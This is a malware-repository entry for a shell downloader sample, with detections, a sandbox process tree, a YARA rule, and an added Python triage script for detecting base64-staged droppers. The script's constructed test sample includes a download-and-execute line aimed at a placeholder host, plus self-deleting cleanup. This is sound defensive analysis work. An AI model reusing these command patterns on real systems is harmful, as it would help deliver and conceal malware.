MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 424c9a9f97515dfa3511170263ecdf4bc3cfb8e94ac491d56b4fde4e9d616676. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Threat: unknown
Vendor detections: 7

SHA256 hash: 424c9a9f97515dfa3511170263ecdf4bc3cfb8e94ac491d56b4fde4e9d616676
SHA3-384 hash: d13e94674a770ee861dba80efe1bf1d3de29f2b64853705cd7acbc83f82c4f0edfedad78ac7249ab3867623993eed3cd
SHA1 hash: 282dcdb2ae1ba9fa19cea0d94c5918398fe50e90
MD5 hash: fba52bc5fc0e81eae7b7e359b5e38b8a
humanhash: jig-colorado-nebraska-hamper
File name: k.php
File size: 19,499 bytes
First seen: 2026-03-08 17:46:39 UTC
Last seen: Never
File type: sh
MIME type: text/x-shellscript
ssdeep: 384:vv0M3vgRjGlsaq7DzsO9a4cbddrME8jyfzsO9a4cbddrME8jy4:vbmjfXzsP4cbddr7zsP4cbddrk
TLSH: T14A925BB916496C79BBC0DE7D9F3C7F0CADE881C02118A3ACBA4F39715A2069DDA0535D
TrID: 70.0% (.SH) Linux/UNIX shell script (7000/1)
      30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika: shell
Reporter: abuse_ch
Tags: sh

Intelligence

File Origin
# of uploads: 1
# of downloads: 54
Origin country: DE
Vendor Threat Intelligence

No detections

Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: evasive masquerade

Verdict: Malicious
File Type: unix shell
Detections: HEUR:Trojan-Downloader.Shell.Agent.bc
Status: terminated
Behavior Graph (process tree recovered from the sandbox trace; each child is listed with the syscall that created it, and "write-file" / "delete-file" are the file events the sandbox attached to that process):

pid 4698  /usr/bin/sudo
`- execve  pid 4707  /tmp/sample.bin
   |- clone   pid 4709  /usr/bin/bash
   |- clone   pid 4710  /usr/bin/bash
   |- execve  /usr/bin/mkdir  x7  (pids 4712, 4714, 4717, 4719, 4722, 4725, 4727)
   |- execve  /usr/bin/cp     x15 (pids 4730, 4732, 4735, 4738, 4740, 4743, 4746, 4748, 4751, 4754, 4756, 4758, 4761, 4764, 4766)
   |- execve  pid 4769  /usr/bin/touch
   |- clone   pid 4771  /usr/bin/bash
   |- clone   pid 4772  /usr/bin/bash
   |- clone   pid 4774  /usr/bin/bash
   |- execve  pid 4775  /usr/bin/base64  [write-file]
   |- execve  pid 4778  /usr/bin/bash
   |  |- clone   pid 4781  /usr/bin/bash
   |  |- clone   pid 4782  /usr/bin/bash
   |  |- execve  pid 4784  /usr/bin/ls
   |  |- execve  pid 4787  /usr/bin/cat
   |  |- execve  pid 4789  /usr/bin/ls
   |  |- execve  pid 4792  /usr/bin/mkdir
   |  |- execve  pid 4794  /usr/bin/mv
   |  |- clone   pid 4796  /usr/bin/bash
   |  |- execve  pid 4797  /usr/bin/base64  [write-file]
   |  |- execve  pid 4799  /usr/bin/rm      [delete-file]
   |  |- execve  pid 4802  /usr/bin/ls
   |  |- clone   pid 4804  /usr/bin/bash
   |  |- execve  pid 4805  /usr/bin/base64  [write-file]
   |  |- execve  pid 4808  /usr/bin/ls
   |  |- execve  pid 4810  /usr/bin/cat
   |  `- execve  pid 4812  /usr/bin/ls
   |- execve  pid 4816  /usr/bin/rm  [delete-file]
   |- clone   pid 4818  /usr/bin/bash
   |- clone   pid 4819  /usr/bin/bash
   |- execve  pid 4821  /usr/bin/bash
   `- execve  pid 4823  /usr/bin/rm
Verdict: Malicious
Threat: Trojan-Downloader.Shell.Agent
Threat name: Script-Shell.Trojan.Vigorf
Status: Malicious
First seen: 2026-03-08 17:47:24 UTC
File Type: Text (Shell)
AV detection: 13 of 24 (54.17%)
Threat level: 5/5

Result
Malware family: n/a
Score: 4/10
Tags: defense_evasion discovery linux
Behaviour:
  Reads runtime system information
  Writes file to tmp directory
  Deobfuscate/Decode Files or Information

Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: SUSP_LNX_Base64_Exec_Apr24
Author: Christian Burkard
Description: Detects suspicious base64 encoded shell commands (as seen in Palo Alto CVE-2024-3400 exploitation)
Reference: Internal Research
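The sandbox trace above (base64 with a write-file event, bash executed afterwards, rm with a delete-file event, files written under /tmp) and the YARA rule's description of base64-encoded shell commands describe a pattern an analyst can check statically before ever running a sample. The Python script below is an added example, not code from MalwareBazaar, from the YARA rule's author, or from the sample: it scans a shell script for base64 literals piped through `base64 -d`, decodes them, and reports whether the decoded stage is written under /tmp, executed, removed again, and whether the script deletes itself. SAMPLE_SCRIPT and STAGE2 are constructed inputs that only mimic the shape of the trace; they are not the contents of k.php, and example.invalid is a placeholder host.

```python
"""Static triage of a shell dropper that stages a base64-encoded payload.

Added example: not code from MalwareBazaar, the YARA rule author, or the sample.
SAMPLE_SCRIPT and STAGE2 are constructed inputs shaped like the sandbox trace
(mkdir/cp/touch, base64 -d writing under /tmp, bash on the result, rm of the
stage and of the script itself); they are not the content of k.php.
"""
import base64
import re

# Constructed second stage; it is base64-encoded into SAMPLE_SCRIPT at import
# time so the example never relies on a hand-typed base64 literal.
STAGE2 = (
    "#!/bin/sh\n"
    "curl -s http://example.invalid/p -o /tmp/.x/p\n"   # placeholder host
    "chmod +x /tmp/.x/p\n"
    "/tmp/.x/p\n"
)

_B64 = base64.b64encode(STAGE2.encode()).decode()
SAMPLE_SCRIPT = "\n".join([
    "#!/bin/sh",
    "mkdir -p /tmp/.x /tmp/.y",
    "cp /bin/sh /tmp/.x/sh",
    "touch /tmp/.x/.lock",
    f"echo '{_B64}' | base64 -d > /tmp/.y/stage2",
    "bash /tmp/.y/stage2",
    "rm -f /tmp/.y/stage2",
    'rm -f "$0"',
]) + "\n"

DECODE_CMD = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")   # long runs only, cuts noise
REDIRECT = re.compile(r">\s*(\S+)")
SELF_DELETE = re.compile(r"\brm\b.*\$0")
URL = re.compile(r"https?://[^\s'\"]+")


def decode_literal(token):
    """Strict base64 decode to text; None if the token is not valid base64/UTF-8."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-8")
    except ValueError:   # binascii.Error and UnicodeDecodeError both subclass it
        return None


def find_staged_payloads(script):
    """One record per line that pipes a base64 literal through `base64 -d`."""
    found = []
    for lineno, line in enumerate(script.splitlines(), 1):
        if not DECODE_CMD.search(line):
            continue
        redirect = REDIRECT.search(line)
        for token in B64_TOKEN.findall(line):
            text = decode_literal(token)
            if text is not None:
                found.append({
                    "line": lineno,
                    "target": redirect.group(1) if redirect else None,
                    "decoded": text,
                })
    return found


def triage(script):
    """Summarise stage/exec/cleanup indicators for a shell script without running it."""
    lines = script.splitlines()
    stages = find_staged_payloads(script)
    targets = sorted({s["target"] for s in stages if s["target"]})

    def any_line(pattern):
        return any(re.match(pattern, line) for line in lines)

    # Only sh/bash invocations on a decoded file are counted as "executed".
    executed = [t for t in targets
                if any_line(r"^\s*(?:ba)?sh\s+" + re.escape(t) + r"\b")]
    deleted = [t for t in targets
               if any_line(r"^\s*rm\b.*" + re.escape(t) + r"\b")]
    urls = sorted({u for s in stages for u in URL.findall(s["decoded"])})
    return {
        "stages": stages,
        "writes_tmp": any(t.startswith("/tmp/") for t in targets),
        "executes_decoded": executed,
        "deletes_decoded": deleted,
        "self_delete": any(SELF_DELETE.search(line) for line in lines),
        "urls_in_decoded": urls,
    }


if __name__ == "__main__":
    report = triage(SAMPLE_SCRIPT)
    for stage in report.pop("stages"):
        print(f"line {stage['line']}: base64 stage written to {stage['target']}")
        print("  decoded:", stage["decoded"].rstrip().replace("\n", "\n           "))
    for key, value in report.items():
        print(f"{key}: {value}")
```

Run as a file it prints the triage of the constructed sample; for a real sample, pass the script text to `triage()`. The token pattern deliberately requires a run of at least 24 base64 characters on the same line as the decode command, so ordinary short uses of `base64 -d` are not reported, and a dropper that feeds the blob from a heredoc or a separate file needs that text joined onto the decode line first. Decoding is strict (`validate=True`), so a literal with stray characters is skipped rather than half-decoded.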

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Web download: sh 424c9a9f97515dfa3511170263ecdf4bc3cfb8e94ac491d56b4fde4e9d616676 (this sample)
Delivery method: Distributed via web download